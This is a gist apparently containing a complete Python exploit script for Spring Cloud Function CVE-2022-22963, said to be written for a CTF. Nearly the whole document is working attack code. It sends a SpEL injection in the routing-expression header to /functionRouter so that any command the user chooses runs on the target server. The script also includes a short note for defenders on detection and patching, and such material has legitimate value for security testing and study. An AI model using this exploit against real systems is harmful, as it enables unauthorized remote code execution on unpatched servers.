@bryanmcnulty
Created March 18, 2023 15:19
Exploit for Spring Boot CVE-2022-22963 - Remote Code Execution
#!/usr/bin/env python3
'''
* Written for a CTF :)
* ---
* Author: Bryan McNulty
* Contact: bryanmcnulty@protonmail.com
* GitHub: https://github.com/bryanmcnulty
* ---
* Dependencies:
* - argparse
* - requests
*
* Proof-of-concept for CVE-2022-22963 (SpEL injection through the routing-expression header)
* Affects Spring Cloud Function installations:
* - Up to (including) 3.1.6
* - From (including) 3.2.0 up to (including) 3.2.2
'''
import argparse
import requests
# ASCII-art banner with author details; main() prints it once at startup.
# Cosmetic only: nothing else in the script reads it.
BANNER = '''
___ _ _ ___ ___ __ ___ ___ ___ ___ ___ ___ __
/ _/| \\ / || __|__(_ |/ \\(_ |(_ |__(_ |(_ |/ _ \\ / __||__`.
| \\__`\\ V /'| _||__|/ /| // |/ / / /|__|/ / / / \\__ /| ,_ \\ |_ |
\\__/ \\_/ |___| |___|\\__/|___||___| |___||___| /_/ \\___/|__.'
Author: Bryan McNulty
Contact: bryanmcnulty@protonmail.com
'''
def exploit(url, command):
    '''Send one POST to ``<url>/functionRouter`` with a SpEL routing expression.

    The expression is placed in the ``spring.cloud.function.routing-expression``
    request header and asks the server-side evaluator to call ``Runtime.exec``
    with *command*; this is the CVE-2022-22963 behaviour the proof-of-concept
    demonstrates.

    Defender's view: the observable is an inbound request to ``/functionRouter``
    that carries a ``spring.cloud.function.routing-expression`` header. That
    header arriving from an untrusted client is worth logging and alerting on,
    or dropping at the reverse proxy. The durable fix is to upgrade past the
    affected versions listed in the module header.

    Args:
        url: Target base URL; main() passes it with trailing slashes removed.
        command: Command text embedded in the Java string literal.

    Returns:
        None. Progress is reported on stdout only.

    Notes:
        * ``requests.post`` is called without a ``timeout``, so the call blocks
          for as long as the server keeps the connection open, and any
          ``requests`` exception propagates to the caller.
        * The success message is a heuristic: it only checks whether the
          response body mentions ``java.lang.ProcessImpl``. Presumably the
          server echoes the evaluated object in its error body -- confirm
          against the target before relying on it.
    '''
    # Backslashes are doubled before quotes are escaped; the reverse order
    # would double the backslashes that the quote escaping introduces.
    escaped = command.replace('\\', '\\\\')
    escaped = escaped.replace('"', '\\"')
    java_expression = 'T(java.lang.Runtime).getRuntime().exec("%s")' % escaped

    endpoint = '%s/functionRouter' % url
    routing_headers = {'spring.cloud.function.routing-expression': java_expression}
    # The form body is a placeholder; only the header carries the expression.
    response = requests.post(url=endpoint, data={'x': 'y'}, headers=routing_headers)

    process_marker_seen = b'java.lang.ProcessImpl' in response.content
    if process_marker_seen:
        print('[+] Successfully created process')
    print('[*] Done')
def main():
    '''Print the banner, parse the two positional arguments and call exploit().

    The ``url`` argument has trailing slashes removed before use, because
    exploit() appends ``/functionRouter`` to it.
    '''
    print(BANNER)
    cli = argparse.ArgumentParser(
        prog='CVE-2022-22963',
        description='Spring Cloud CVE-2022-22963 Exploit',
    )
    positionals = (
        ('url', 'Target base URL'),
        ('command', 'Command to run'),
    )
    for arg_name, arg_help in positionals:
        cli.add_argument(arg_name, help=arg_help)
    parsed = cli.parse_args()
    base_url = parsed.url.rstrip('/')
    exploit(base_url, parsed.command)
# Run the command-line interface only when the file is executed as a script,
# so importing the module sends no request and prints nothing.
if __name__ == '__main__':
    main()